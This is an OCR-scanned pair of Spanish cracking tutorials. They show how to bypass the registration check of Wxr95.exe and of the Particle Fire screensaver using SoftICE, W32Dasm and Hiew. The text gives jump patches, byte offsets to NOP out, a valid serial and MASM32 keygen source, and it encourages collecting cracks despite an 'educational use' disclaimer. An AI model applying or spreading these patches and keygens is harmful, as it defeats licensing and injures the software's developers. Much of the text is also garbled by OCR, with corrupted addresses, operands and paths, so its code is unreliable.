BC 004024F9 y ahora a ensamblar la nueva instrucción, con el comando A del SOFT 


004024f9 0F84CF000000 JZ 004025CE 


004024FF 684A1400 PUSH 0040A1A4 


A 004024F9 [INTRO] 


Nos mostrara.. 


T 


015F:004024F9 á AQUÍ TENEMOS QUE ESCRIBIR EL CAMBIO QUE TENEMOS QUE HACER OSEA. 


015F:004024F9 JMP 004025CE [INTRO] EN ROJO LO QUE HEMOS ESCRITO PAR ENSAMBLARLO. 


015F:004024FF [INTRO]NOS MUESTRA LA SIGUIENTE DIRECCION DE MEMORIA POR SI QUEREMOS SEGUIR 
ENSAMBLANDO NUEVAS INSTRUCCIONES, COMO NO QUEREMOS PULSAMOS [INTRO] Y LA NUEVA INSTRUCCIÓN 
QUEDA ENSAMBLADA. 


150 | 


Ahora fijaros en el Soft como ha cambiado la línea del salto, tiene que mostrar esto. 


004024f9 E9DO00000000 JMP 004025CE a Ahora si salta a 004025C 


Ed 


apuntar en un papel lo que esta en rojo para luego hacer el crack. 


Bueno ahora pulsamos F5 para que se termine de ejecutar el programa y OLEEE J J , no hay 
aviso de error nos ha aceptado el numero pero que numero es?. 


Vamos a C:IWindows y editamos el archivo Wxr95.ini y 


Key=EXPREF062F11 


Este código solo es valido para los datos que hemos utilizado 


Ya tenemos registrado el programa. si miráis en help about veréis los datos que halláis 
metido J 


PARTE 2 W32Dasm 


Quiero deciros que en esta segunda parte no me voy a extender en explicaciones, ya que es el 
mismo programa solo que con distinta herramienta las explicaciones de funcionamiento, 
protecciones y ataques son las mismas que con el Soft. 


Lo primero hacer una copia del ejecutable Wxr95.exe bien con otro nombre o copiando todo el 
programa a otra Carpeta. Abrir el original con el W32Dasm y la copia con un Editor HEX. 


Empezamos pulsamos el botón del W32dasm que nos muestra todas las cadenas de texto. 
Localizamos la que nos escupe cuando fallamos en el registro 


Wrong password please reenter 


Hacemos doble clip sobre la frase y nos lleva a 


Possible StringData Ref from Data Obj á " Wrong password please re-enter " 


á " Informarion." 


:0040259%c 6860*14000 PUSH 0040A160 


bueno pues como siempre tenemos que encontrar un salto con la siguientes características, 
que según el valor que le asignen pueda saltarse este aviso, o que su ejecución normal le 
permita llegar asta este aviso, dependiendo de si acepta el registro o no, pues ala manos a 
la obra. 


Os habéis fijado, que según íbamos hacia arriba nos encontrábamos con un montón de avisos 
todos ellos relacionados con formulario de registro, y al final de todos ellos el salto con 
las características que buscamos. 


:004024F7 85c0 TEST EAX,EAX á si el numero es correcto le dice a el salto que salte a 
la dirección 004025ce, si es falso continua ejecutándose en la siguiente línea, y empieza a 
generar los mensajes de error. 


:004024F9 0F84CF000000 Je 004025CE a Según el valor que le asigne TEST salta o no. 


Como veis si salta evitaría el aviso de error, y si no salta continuaría normalmente hasta 
el aviso maligno. Que tenemos que hacer para que salte convertirlo en un salto incondicional 
que salte por narices. 


Como he comentado en la parte 1 no estamos acostumbrados a realizar cambios se saltos, con 
tantos Bytes, así que os explicare como saber que bytes son los validos para poder patchear 
el je por jmp 


En el menú de archivos pulsar en debug y seguidamente en load proccess, vamos a aplicar el 
cambio al estilo del Soft, con el programa en marcha. Para el que no lo sepa el W32dasm 
cuenta con su propio debug es pobre comparado con el soft aunque muy cojonudo comparado con 
otros que hay por hay , dedicare un turorial a explicar como utilizar este debug. 


Bueno si habéis hecho lo que os dije, ahora tendréis una ventanita con una línea de 
comandos, si poner nada pulsar load, y el debug empieza a ejecutar el Wxr95.exe 


Ahora pulsar en la opción GOTO ADDRESS ( IR A UNA DIRECCION DE MEMORIA ), aparecerá una 
ventana donde debéis de meter la dirección de memoria donde se encuentra el salto que 
queremos patchear escribimos 004024f9 , y pulsamos OK 


= 


E inmediatamente aparec n la ventana de procesos nuestro salto. 


Ahora para modificarlo pulsaremos la casilla Patch Code y se habré otra ventana con nuestro 
salto y una línea de comandos para aplicar los cambios que queremos realizar, osease que 
escribimos: 


JMP 004025CE Y PULSAMOS [INTRO] 


T 


Ahora fijaros en code Patch listing hay tenemos el patcher que acabamos de generar, tiene 
que mostraros esto 


004024f9 E9D00000000 JMP 004025CE el patcher todavía no esta aplicado, pero ya sabemos 
cuales son los Bytes que hay que utilizar para Cambiar el je del código original por el jmp 
del código manipulado, estos bytes son los que están en rojo, si quereis generar luego el 
cack recomiendo que lo apunteis, para aplicarlos en el editor HEX. 


Bueno apliquemos el patcher a el programa, todavía tenemos la ventana donde nos muestra el 
patcher que hemos generado, para aplicarlo solo tenemos que pulsar la opción Apply Patch, 
una vez que hemos pulsado esa opción nos pide confirmación, aceptamos claro, y ya esta 
cerramos esa ventana pulsando Close, ahora ya esta el patch aplicado, se supone que si 
pulsamos la opción run o la tecla F9 el programa aceptara cualquier registro que metamos. Y 
como era de esperar así ha sido. 


Ahora si miráis en el archivo Wxr95.ini que se encuentra en C:lwindows veréis en 
KEY:vuestra Clave de registro 


No es necesario parchear con el Editor Hex los cambios, ya que nos ha generado una clave 
valida en el archivo Wxr95.ini, bueno en realidad la clave si la metes desde el formulario 
de registro no es valida, lo que es valido es todo el archivo Wxr95.ini, que en este caso 
seria un Crack valido. 


De todos modos yo os recomiendo que generéis el crack parcheando la copia del ejecutable con 
el editor Hex, y hacer el ejecutable con cualquier Generador de cracks, lo guardais hasta 
que tengáis una gran colección, luego le dejáis flipado/a a la novia/o J 


No explicare como aplicar los cambios con el Hex, por que ya tenéis nivel para eso y mucho 
mas. hasta el próximo tutorial, 


Un saludo a Todos/as [y como no a el Bhuo]. 
( Karpoff.) 


Como siempre espero que lo halláis cogido, yo intento explicar lo mejor que puedo, pero no 
soy ningún experto. 


Si teneis algun programa que os esta dando gerra porque no podeis con el, Podemos analizarlo 
aqui. Solo teneis que mandarme un email. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofff(hotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Programa [Particle Fire screensaver v1.la W9S5 / W98 / NT 
nes [Salvapamaas 
A Ma e as 

Url http://www.longbowdigitalarts.com/particlefire.html 
Peón aa 
| Dificultad [1) Principiante y 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas — [Softlce v4.00, Regmon, Hiew 6.04 (mASM32 opciona) 
| Objetivo  [Parchear la comprobación del S/N o hallar uno válido. 
rare Am 
Fea 1 e Agosto de 1 


Introducción 


El salvapantallas es vistoso, aunque es el primero que veo que pretenden 
hacerte pagar por él (hay gratis a patadas en internet), aunque bueno, cada 
cual que haga lo que quiera; si realmente te gusta, creo que solo son unos 
10$... Para registrarse, hay que introducir un número en la pantalla de 
configuración del salvapantallas; si no, al cabo de 7 días, cuando el 
salvapantallas lleva un par de minutos, comienza con los clásicos mensajitos 
tipo "regístrate porfa". Nunca he visto un tutorial sobre un screensaver, así 
que ya que lo conseguí con este, he pensado en contarlo y de paso ilustrar la 
aplicación del método 'bpx RegQueryValueExA' para programas que 
interactuan poco o nada con el usuario a la hora de registrarse pero que leen 
datos tipo s/n desde el registro de Windows (este es su punto de contacto 
con el mundo 'real'). Dado que me considero un principiante, he tratado de 
escribir esto a un nivel bastante bajo, aunque he desarrollado dos métodos 
de cracking, uno para principiantes (parchear) y uno para amateurs 
(keygen); es por estos motivos que este documento es un poco largo. Sin 
embargo, la gente más avanzada podrá leerlo de corrido (o leer directamente 
el 'briefing' (resumen) del final de todo). 


Al Atake 


1. Familiarizándonos 
Bien, nuestro primer punto de partida es familiarizarnos con el programa y su mecanismo de 
protección. Éste consiste en la introducción de un número en la ventana de configuración del 
protector de pantalla (podemos acceder desde Panel de control / Propiedades de pantalla / Configurar 
protector pantalla, o bien desde el menú contextual que aparece al pulsar el botón derecho sobre el 
fichero de ParticleFire). Si el número no es el correcto, y ya han pasado 7 días desde que lo 
instalamos, veremos mensajes molestos al cabo de un par de minutos de iniciarse el screen saver 
(adelantad 10 días el calendario para verlos). 


Así que tenemos que solucionar eso... pero para nuestra desdicha, constatamos que, tras introducir un 
número (por ejemplo 12345) y aceptar, no aparece ningún mensaje que valide o invalide el código 
introducido. Sin embargo, si volvemos a entrar, nuestro número sigue ahí. Si hacemos algún 
experimento, probando números y entrando y saliendo de la configuración, llegaremos a la 
conclusión de que, posiblemente, el serial num debe ser de 10 cifras (o menos) y formado 
exclusivamente por números (de otro modo, trunca o pone a cero la expresión introducida cuando 
volvemos a entrar a "configurar”). 


Ahora que creemos tener una leve orientación sobre lo que buscamos, hacemos pruebas a base de 
poner break-points en las típicas funciones que capturan el texto de un cuadro de diálogo, 
comparación de cadenas, etc. Pero... no parecen llevarnos a ninguna parte. 


Quizás los autores del Particle Fire quieran echarnos una mano ;) echamos un vistazo al read-me que 
lo acompaña. Allí encontramos un par de informaciones interesantes: 


(1) 'asegúrate de introducir correctamente el serial-num' 
(2) 'por favor no digas a nadie tu número de registro' 


Traducción: 


(1) no hay mensaje tipo 'gracias por registrarte' o 'serial num incorrecto' 
(2) el número es independiente de tu nombre, disco duro, etc.. 


Si bien el punto (2) nos facilita un poco las cosas, el (1) las complica porque significa que, 
posiblemente, la comprobación del serial num no se realiza cuando lo entramos en 'configurar' si no 
al correr el salvapantallas. Es decir, la típica relación causa-efecto entre el serial/keyfile/etc y nag 
screen/reminder/lo que sea, está en cierto modo disociada, separada, retardada. 


Sin embargo, tiene que haber un nexo de unión entre ambos. El número que entramos en configurar, 
el Pfire lo tiene que leer de algún sitio. Yo ya me imagino donde está, pero vamos a correr el Regmon 
para asegurarnos... ejecutamos el salvapantallas y nos encontramos con que, antes de comenzar, lee 
una serie de parámetros del registro. Entre ellos, el serial num... si hacemos doble click sobre esa 
línea desde RegMon, se abrirá el RegEdit en esa rama, y veremos que el Pfire, como buen 
screensaver, tiene guardaditos ahí sus parámetros, incluido el serial num que le hayamos puesto... 
estos parámetros los debe de leer el Particle Fire cuando se ejecuta como salvapantallas... que bien... 
porque hace poco estuve leyendo algo sobre la función API RegQueryValue, que precisamente es 
la que lee datos del registro. Pero en realidad hay varias parecidas; RegQueryValue, 


RegQueryValueEx y RegQueryValueA. Para Win32 ansi la 'ExA' es la que nos vale, pero por 
si tenemos duda en estos casos, abrimos el fichero en el w32 Dasm, y le damos al botón de funciones 
importadas; allí nos aparecerá, para este caso, la función RegQueryValueExA, junto a otras funciones 
tipo OpenKey que van "abriendo" el camino para la QueryValue. Creo que el serial num se debe 
sentir un poco solo, así que vamos a tratar de acompañarle durante su viaje, a ver que hacen con él. 
Antes de empezar, escogemos un serial que nos haga de referencia, para identificarlo luego cuando lo 
lea y lo compare o haga lo que sea con él. Basándonos en nuestras pruebas, ponemos 1000000000 
(mil millones) en la pantalla de configurar (podemos poner otro, pero recordemos cual), aceptamos y 
salimos. Tomamos tambien nota del equivalente en hexadecimal de nuestro número, para que no nos 
cojan desprevenidos; 3B9ACAOO. Ahora pondremos el breakpoint y trataremos de subirnos al tren a 
la vez que lo hace nuestro serial. 


2. Manos a la obra: un breakpoint en la lectura del registro 

Para ello, ctrl+d, bpx RegQueryValueExaA, ctrl+d. Traducción: entramos al Softlce, ponemos un 
breakpoint en la función de Windows que lee del registro para que el Softlce nos avise y salimos otra 
vez a Windows con ctrl+d. Ahora tenemos dos opciones, ejecutar nosotros mismos el salvapantallas o 
esperar que salga (previamente le habremos puesto el mínimo tiempo, un minuto). Esto puede parecer 

una tontería, pero si lo ejecutamos directamente, aparecerán unas 50 llamadas-basura a la función 

RegQueryValueExaA (por lo menos a mi me pasa). Si esperamos que salga el Pfire por si solo, ya 
casi estaremos en el punto (nota: puede que durante la espera nos salte el breakpoint hasta 10 veces o 

más -o quizás ninguna-, por accesos rutinarios del sistema al registro; lo ignoramos haciendo ctrl+d 
para salir otra vez, y seguimos esperando hasta que pase el minuto y nos salga el pfire; para disminuir 

el riesgo de que pase esto, mejor no tener programas abiertos o solo lo imprescindible, y 
evidentemente, no tocar ninguna tecla ni mover el ratón). 


Al cabo de un minuto, nos sale un breakpoint. Este ya es del propio Pfire, ya que en el borde inferior 
derecho del Softlce pondrá 'Particle Fire". No obstante, las primeras llamadas aún no nos 
interesan. Si hacemos F12, veremos que se ha llamado a la función a través de un CALL ESI o 
CALL EBX. Mientras esto suceda (seguramente saldrán 4 llamadas de este tipo en total, dos de cada), 
vamos haciendo ctrl+d, hasta que llegue un momento en que al salir el breakpoint y apretar F12 
veamos que se ha llamado a la función por su nombre, algo así como: 


PUSH ECX 


PUSH ESI 

PUSH ESI 

PUSH 004147F8 

PUSH DWORD PTR [EBP-04] 

CALL [ADVAPI32!RegQueryValueExA] 
TEST EAX, EAX 


(Insisto, ten en cuenta que no 'aterrizas' directamente aquí, tienes que haber pulsado F12) 


Vamos a comentar la jugada: en azul, los PUSH van pasando uno a uno los parámetros de la función, 
a la cual se llama con el CALL, en rojo. Concretamente, el penultimo valor contiene la dirección de 
memoria donde se halla el nombre del valor que se quiere leer (esto lo sabemos si miramos la 


documentación de referencia de WinAPI32). En este caso, vemos que es 4147F'8, así que hacemos 
und 4147F8 para que el Softice nos muestre que hay en esa dirección. Veremos en la pantalla de 
datos (si no la tienes a la vista, se pone/quita con wd) que es 'screensaveusepassword'. Bueno, esto no 
nos interesa, solo debe estar comprobando si tenemos puesto password con el salvapantallas o no. Así 
que ctrl+d, y de nuevo ha saltado el breakpoint por otro acceso al registro. Pulsamos F12 para ver 
quien le ha llamado y como, y tenemos: 


015F:00404F7A PUSH EAX 

015F:00404F7B PUSH ECX 

015F:00404F"7C MOV EAX, [ESI+00000400] 
015F:00404F82 PUSH EDX 

015F:00404F83 PUSH 00 

015F:00404F85 PUSH EBX 

015F:00404F86 PUSH EAX 

015F:00404F87 CALL [ADVAPI32 ! RegQueryvalueExA] 
015F:00404F8D TEST EAX, EAX 
015F:00404F8F JNZ 00404FA7 
015F:00404F91 MOV EAX, (ESP+14] 
015F:00404F95 MOV ECX,ESI 
015F:00404F97 MOV [EDI], ,EAX 


Reconocemos la idea otra vez, ¿no? En azul, son los parámetros que pasamos, en rojo la llamada a la 
función. Como veríamos si siguieramos saliendo y entrando, este fragmento del código es el que a 
partir de ahora se repetirá en cada lectura de valores del registro (claro que cada vez se lo montará 
para usar parámetros distintos, si no siempre haría lo mismo, pero será el mismo trozo de programa), 
de modo que vamos a borrar nuestro breakpoint con bc 00, y a poner otro justo en el punto donde 
llama a la función, para que antes de llamarla podamos ver qué pretende hacer; así que ponemos bpx 
404£87 (fíjate cual es esta dirección en tu caso; podría ser otra). Este cambio de breakpoint no es 
100% imprescindible, pero así nos ahorraremos darle al F12 cada vez y todo será más claro, puesto 
que pararemos ANTES de entrar en la función RegQueryValueExa. Por cierto, antes de salir 
hacemos d ebx y vemos : RandomTime, uno de los parámetros. Bueno, aún no es el que nos 
interesa, pero parece que estamos en el buen camino... 


Así que ctrl+d para salir, y boom, ya estamos otra vez en Softlce, justo antes de llamar otra vez a 
RegQueryValueExA (no hemos de pulsar F12). Vamos a ver que quiere leer ahora... hacemos d 
ebx, y nos sale GravityTime... otro parámetro, y justo despues suyo pone RandomTime...mmh, 
es el anterior... usamos alt+flecha arriba/abajo para desplazarnos por ese listado, y vemos como 
encima de esos parámetros, están los demás haciendo 'cola', concretamente deberíamos estar viendo 
RandomColor, ColorScheme, Particles y ... nuestro querido SerialNum! Pues bueno, 
como es evidente se trata de ir haciendo ctrl+d y comprobando ebx (todo el rato el listado será como 
el que he puesto más arriba) hasta que estemos en el punto en que va a leer el serial num. Son 4 
veces, pero es recomendable ir uno a uno y comprobando ebx hasta que veamos que apunta 
directamente a SerialNum. Ahora querremos ver que hace con él, así que vamos a ir trazando la 
función. Estamos situados en el CALL [ADVAPI32 ! RegQueryvalueExA]; pulsamos F10 
puesto que no nos interesa seguir a la función API en sí (tanto FS como F10 ejecutan igual el 
programa, pero con F10 nos ahorramos ver la ejecución de CALLs como este que no nos interesan). 
Ahora representa que hemos vuelto de la función que lee el registro, y el valor de nuestro serial num 


de prueba debe andar en alguna parte. Observemos las lineas siguientes al CALL: 


015F: 
0O15F: 
0O15F: 
015F: 
015F: 
0O15F: 
015F: 


00404F87 
00404F8D 
00404F8F 
00404F91 
00404F95 
00404F97 
00404F99 


CALL [ADVAPI32 ! 
TEST EAX, EAX 
JNZ 00404FA7 
MOV EAX, [ESP+14] 
MOV ECX,ESI 

MOV [EDI],EAX 
CALL 00404EC0O 


RegQueryvalueExA] 


El test eax,eax y el jnz parecen una comprobación de rutina a la vuelta de la función. Los 
movimientos que hay despues parece que sean mas deliberados. Echamos un vistazo a esos valores, 
teniendo en cuenta que nuestro serial 1000000000 en hexadecimal es 3B9ACA0O. Haciendo d 
esp+14, enseguida encontramos que en esa dirección está nuestro querido serial, que es copiado a 
EAX (nota: si veis el serial 'al revés' o sea OOCA9A3B, pulsad SHIFT+F3 para cambiar el formato de 
la ventana data hasta verlo como DWORD - gracias PicsOne!). Pero no le perdamos la pista, porque 
dos lineas más abajo vuelve a cambiar de vagón: ahora EAX se copia a la dirección apuntada por 
EDI. Bueno, pues miramos el valor de EDI con ? edi, y en mi caso es 412114. Ahí se sienta mi 
serial, así que vamos a poner un breakpoint para que cualquier acceso a esa posición de memoria sea 
detectada; ponemos bpm 412114 (ojo, no bpx si no bpm : no controla la ejecución si no la 
manipulación de lo que hay en ella). Tambien quitamos el bex 404f87 que teníamos, puesto que 
ya nos ha aportado lo que queríamos; bc 00, ctrl+d y salimos del Softice. 


3. La rutina de comprobación del serial 


Y en una fracción de segundo ya hemos vuelto al Softice. Alguien está metiendo mano a nuestro 
serial. Vemos lo siguiente: 


OISPr00402726 MOV EAX, [00412114] 
015F:0040272B PUSH EAX 
015F:00402720 CALL 00401000 
015F:00402731 ADD ESP, 04 
015F:00402734 TEST EAX, EAX 
015F:00402736 JNZ 00402A69 


En pocas palabras, carga nuestro serial en EAX, lo envía a la pila con un PUSH y llama a algún tipo 
de rutina en la 401000... ¿quizás la que comprueba si es correcto? Vamos a seguir la rutina; vamos 
pulsando F8 (ahora si que nos interesa ver qué hace el CALL) hasta que al ejecutar el CALL, 
llegamos a una rutina que es ya la pieza clave de todo el asunto; veámosla parte a parte: 


015F:00401000 MOV EAX, [ESP+04] 

015F:00401004 PUSH ESI 

015F:00401005 CMP EAX,3B9ACA0O ; compara con 1000000000 
015F:0040100A JBE 00401049 ¿ si menor o igual, fracaso 
015F:0040100C CMP EAX, 77359400 ; compara con 2000000000 
015F:00401011 JAE 00401049 ¿ si mayor o igual, fracaso 


Esta primera parte en azul hace lo siguiente: recupera en EAX el valor de la pila (ESP+04), que como 
sabemos es nuestro serial, y a continuación comprueba que sea mayor que 3B9ACA0O (mil millones 
en decimal) y menor que 77359400 (dos mil millones en decimal). Si no es así, salta a la 401049, 
la cual huele a fracaso porque es más fácil ir a parar a ella que evitarla. No ibamos tan mal 
encaminados, ahora sabemos el rango concreto en el que se situa el serial. Claro que hay mil millones 
de números en ese intervalo, y si tenemos planes para el resto de nuestra vida, no vamos a poder 
probarlos todos. Veremos que más comprueba si el número cumple el requisito anterior. El código 
que viene ahora lo podemos ver, aunque al ir trazando con E8 no lo ejecutará (saltará a la 401049 tras 
la primera comparación) ya que nuestro serial no es MAYOR que mil millones. Si quisieramos trazar 
esta parte del código para ir mirando como cambian los registros, etc, podemos hacer una pirula; 
situarnos con el ratón en EAX y cambiar su contenido de 3B9ACAD0O (nuestro serial) a 3B9ACAO1, 
por ejemplo. Sea como sea, veamos lo que viene ahora, resaltado en rojo: 


015F:00401013 MOV ECX, EAX 
015F:00401015 MOV ESI,EAX 
015F:00401017 SHL ECXx,14 
015F:0040101A MOV EDX, EAX 
015F:00401010 SHL ESI,10 
VisESOO4OLOLE AND ECX,FFF0O0000 
015F:00401025 SHR EDX,10 
015F:00401028 OR ESI,EDX 
015F:0040102A SUB EDX, EDX 
015F:00401020 XOR ESI,ECX 
015F:0040102E MOV ECX, EAX 
015F:00401030 SHR ECXFDE 
015F:00401033 XOR ESI,ECX 
015F:00401035 MOV ECX00002694 
015F:0040103A XOR EAX,ESI 
015F:0040103C DIV ECX 
015F:0040103E TEST EDX, EDX 
015F:00401040 JNZ 00401049 
015F:00401042 MOV EAX,00000001 
015F:00401047 POP ESI 
015F:00401048 RET 

015F:00401049 XOR EAX, EAX 
015F:0040104B POP ESI 


015F:0040104C RET 


En pocas palabras: el tramo resaltado en rojo hace unas operaciones con nuestro número; el tramo 
siguiente, en blanco, determina si el número ha "pasado la prueba", y de no ser así, nos envía a la 
401049... sí, la que olía a fracaso, aquí de color gris, que es la vía de salida de los perdedores... Pero 
por suerte nosotros no somos de esos. Nos interesa recorrer todo el tramo blanco, donde vemos que 
basicamente vuelve copiando un 1 en EAX, que a mi me huele que es una especie de flag tipo 'si, 
teniente; el chico está limpio", ya que en caso contrario, lo primero que se hace en la 401049 es 
poner eax a cero con el xor eax,eax así que veamos por donde atacar... 


Lo primero que deberíamos pensar, una vez suponemos que este es el punto clave, es que todo ese lío 
en color rojo no merece que nos rompamos la cabeza; lo más fácil es parchear algo, tipicamente las 


comparaciones y/o los saltos. Es un principio del cracking elegir la vía más fácil y no calentarse la 
cabeza gratuitamente. Aunque por otra parte, también se dice que hay que ser lo más elegante 
posible, entendiendo esto como practicar la mínima intrusión al modificar el código del programa. Y 
desde luego si queremos aprender algo, habrá que hacer caso de lo que dicen los que saben del tema. 
Claro que tambien nos advierten de que en la práctica se dan casos como este, donde nos 
encontramos en una disyuntiva; lo más fácil es parchear, pero lo más elegante es generar un serial 
bueno sin tocar el programa original. En este caso, decidí que buscaría un serial correcto más por 
aprender algo que por otra cosa, pero en este tutorial desarrollaré ambas posibilidades; la de parchear 
es más apropiada para principiante, y la de analizar el código en rojo y encontrar un serial para 
amateur (requiere un poquito más de esfuerzo). Comencemos por el parcheo. 


4. Opción fácil : parchear 


Como sabeis, parchear consiste en sustituir unas intrucciones por otras; típicamente se cambian saltos 
y comparaciones por 'nops' (NOPs = no operation, o sea no hacer nada). También, en casos como 
este, podíamos haber considerado pasar de todo y 'borrar' los mensajes shareware parcheando con 
"00", pero por varios motivos no me parece una vía con futuro. El caso es que siempre hay varias 
opciones, pero en nuestro caso creo que la más simple sería parchear los 3 saltos a la 401049 con 
nops, de modo que si el número es menor que un millardo o mayor que dos, o si no cumple la 
condición que luego se aplica, en vez de saltar a la 401049, no hace nada y sigue. Con lo cual el 
código correrá sin alteraciones en su flujo hasta el final del tramo blanco. Así que ponemos code on, 
y vemos el valor de los bytes que equivalen a esas instrucciones en el fichero; la primera 
comparación es 3d00ca9a3b, el primer salto jbe es 7636, la segunda comparación es 
3d00943577, el segundo salto jae es 7336, y el último es 7507 (en realidad solo nos interesa el 
código de los saltos, pero tomamos nota de los que van antes y despues para luego asegurarnos que 
hemos encontrado el correcto). Ponemos el editor hexa, en mi caso el hiew, cargamos el fichero, 
pulsamos F4 y elegimos hex, y pulsamos F7 para buscar. Con la tecla tab saltamos al campo 'HEX' y 
tecleamos 3d00ca9%a3b763d3d00943577 (o solo 763d pero luego a ojo miramos que lo de 
antes y despues es lo que esperábamos, si no seguimos buscando). Así nos aseguramos de estar en el 
punto correcto comprobando que los códigos anteriores y posteriores coinciden con los que anotamos 
antes. El hiew nos situará al principio de la localización de la cadena de bytes hallada. Como todo 
está en la misma zona, localizando el 763d ya vemos a ojo los demás un poco más abajo. Pulsamos 
F3 para editar, y situándonos en los lugares correctos, cambiamos 763d,7336 y7507 por 9090, 
9090 y 9090 (si metemos la pata, con esc deshacemos los cambios y luego empezamos de nuevo). 
Si esta ok, pulsamos F9 para grabar los cambios en el fichero. Para hacerlo aún más fácil, ahí va una 
lista de los offset locales, el valor original de cada byte y el valor parcheado: 


File 1: File 2: 
Offset: ORIGINAL PARCHEADO 
40Ah 76h 90h 
40Bh 3Dh 90h 
411h 73h 90h 
412h 36h 90h 
440h 75h 90h 


Number of differences: 6 


(en el hiew, para cambiar entre vista de offset local y offset global, pulsa alt+f1) 


En fin, si despues de esto aún te quedan ganas, puedes buscar un crackmaker y crear tu propio crack a 
partir del fichero original (del que habrás guardado una copia) y el que acabamos de parchear. 


5. Opción no tan fácil: análisis de la rutina de chequeo del serial 
Aunque a mi que no tengo ni idea del tema me dió un poco de dolor de cabeza, solo es cuestión de 
unos minutos y paciencia descifrar el mecanismo que sigue el código que más arriba resalté en rojo. 
Si nuestro número es "+*", el programa realiza la siguiente comprobación: 


XOR [ [í XOR (OR a,b , AND c,ad) , e ] 
, donde, si "$" es igual al serial introducido: 


= shl (+,10) 
= shr (4,10) 
shl1 (4,14) 
fff00000 

= shr (%+,0c) 


00090 
Il 


Una vez calculado el churro en cuestión, llamémosle "F" al resultado, realiza otro xor: 
XOR (+,E) 


, y sobre este resultado, efectua una división (DIV) por 26 94h (la 'h' quiere decir que está en 
hexadecimal, como sabreis). Si la división tiene resto (módulo), fracaso (también conocido como 
billete de ida a la 401049). Por ejemplo, para 3B9ACAO1 (1000000001 en decimal), el resto es 
26f,o0 lo que es lo mismo, distinto de cero, o lo que es lo mismo, de cabeza a la 401049, o lo que 
es lo mismo, fracaso, chico malo, etc. 


El caso es que integrándolo todo, podemos formularlo como una ecuación. Pero ignoro si es posible 
solucionarla de modo analítico (reordenando, simplificando, despejando...), ya que para una cosa que 
s1 que sé un poco (matemáticas), me encuentro con un tipo de funciones (and, or, xor...) alas 
que no estoy acostumbrado. Caso de poderse solucionar, como que ha de tener muchas soluciones (no 
va a haber un único serial), nos quedaría en función de un valor que daríamos nosotros, en plan 
f(x)=y. Pero como digo, yo no sé solucionarlo así. De modo que la alternativa son los métodos 
numéricos (o sea, probando hasta que hallemos un número correcto - con la potencia de cálculo de un 
ordenador, sería cuestión de fracciones de segundo). Yo pretendía probarlo con el solver del Excel 
(da valores hasta encontrar una solución) pero... no puedo utilizar esas funciones porque no están 
disponibles en el Excel (alguna lo está, pero que yo sepa solo con resultados booleanos tipo 
verdadero/falso, no resultados numéricos). De modo que ya que en assembler existen están funciones, 
quizás pudiéramos programar algo... si, hombre, que nadie se asuste, yo no sé casi nada de assembler 
pero mira ahí arriba... el 90 % de nuestro keygen ya está hecho. Simplemente hemos de cambiar que, 
si el número no da resto cero tras la transformación, en vez de "echarnos", aumente una unidad al 


número inicial y pruebe de nuevo. Yo, la primera vez, hice algo muy simple; una rutina que comienza 
por 1000000000, y a partir de ahí, hace un cálculo; le suma una, le hace todo el churro de más 
arriba, y si no da el resto cero, vuelve a sumarle uno, hacer todo el churro... hasta que salga uno 
bueno. Como no sabía cómo mostrar ese número, se me ocurrió poner un messageboxa una vez 
sale del cálculo, antes de terminar el programa, para poder poner un bpx y ver que número había 
salido (hice que cada vez la rutina guardase una copia del número que prueba en EDI, porque el 
original en EAX queda 'desfigurado' por la comprobación). Así que una vez ensamblado, pongo un 
bpx messageboxa, y cuando me sale, le doy a F12 para volver a mi programa principal, y escribo 
? edi,obteniendo 1000002675 en decimal, esto es, ¡el serial del cliente número uno! (que 
honor, seguro que lo reservaban para alguien importante). El programa lo ensamblé con el mASM32; 
como digo no sé assembler más que 4 cosas, por lo cual no puedo entrar en mucha explicación sobre 
parámetros de ensamblado, etc, simplemente creé el ejecutable. Si no me equivoco, era así: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32linc1ludeXwindows.inc 
include c:imasm32lincludelkernel32.inc 
includelib c:imasm321M1liblkernel32.1lib 
include c:imasm32lincludeluser32.inc 
includelib c:imasm3211libluser32.lib 

¿ Cosas generales para ensamblar y linkar 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

MsgBoxText db "Bpx en el NOP y el resultado en EDI",0 
Serial_Start dd 3b9%aca00h 

¿ Yeservamos e inicializamos unas variables del msgbox 
; y el número de inicio (1000000000) 


. code 

start: ¿ Vamos a por ello 

Calculo: 

inc [Serial_Start] ; aumentamos en uno el número de partida 
mov eax,Serial_Start ; lo pasamos a EAX para hacer el test 

mov edi,eax ¿ pero edi guarda una copia por si sale bien 
mov ecx,eax ¿ y comienza la fiesta... 


mov esi,eax 

shl ecx,14h 

mov edx,eax 

shl esi,10h 

and ecx,O0fff00000h 
shr edx,10h 

or esi,edx 

sub edx,edx 

xor esl,ecx 

mov ecx, eax 


shr ecx,0Och 

xor esl,ecx 

mov ecx,2694h 

xor eax,esi 

div ecx 

test edx, edx 

jnz Calculo ; si no es un serial válido, prueba otra vez 

invoke MessageBoxA, NULL, addr MsgBoxText,addr MsgBoxCaption,MB_OK 
; este messagebox hace saltar el breakpoint y nos permite mirar 
¿ en EDI el último número probado, es decir el bueno 

invoke ExitProcess, NULL 

end start 


Espero que al menos se entienda la idea. Mi intención es que otros como yo le pierdan un poco el 
miedo al assembler y vean que, aunque falten conocimientos, con un poco de ingenio a veces se 
pueden solucionar los problemas. 


6. Opción no tan fácil: creación de un keygen semi-decente 


Pero como crear un key-gen, nada. Yo al final creé uno, estoy seguro que está fatal programado, que 
da pena y que quizás solo funcione en mi PC, pero me da números de registro buenos. He de decir 
que no podría haberlo creado sin la *gran* ayuda de Mr. Crimson que me proporcionó una rutina 
para convertir de hexadecimal a decimal (para poder sacar el resultado como string en un msgbox). 
Muchas gracias una vez más, Mr. Crimson. El programa también utiliza la funcion gettickcount 
para crear un número distinto cada vez, aunque no totalmente aleatorio (cada vez es mayor). No es 
perfecto ni mucho menos, pero da el pego. Para el que le interese: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32lincludelwindows.inc 
include c:imasm32lincludelkernel32.inc 
includelib c:imasm321M1liblkernel32.1lib 
include c:imasm32lincludeluser32.inc 


includelib c:imasm321Mlibluser32.lib 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

Mensaje db " = (by Champion) =",13,13," Se va 
a generar un",13," número de serie 

para",13," Particle Fire vl.la",0 


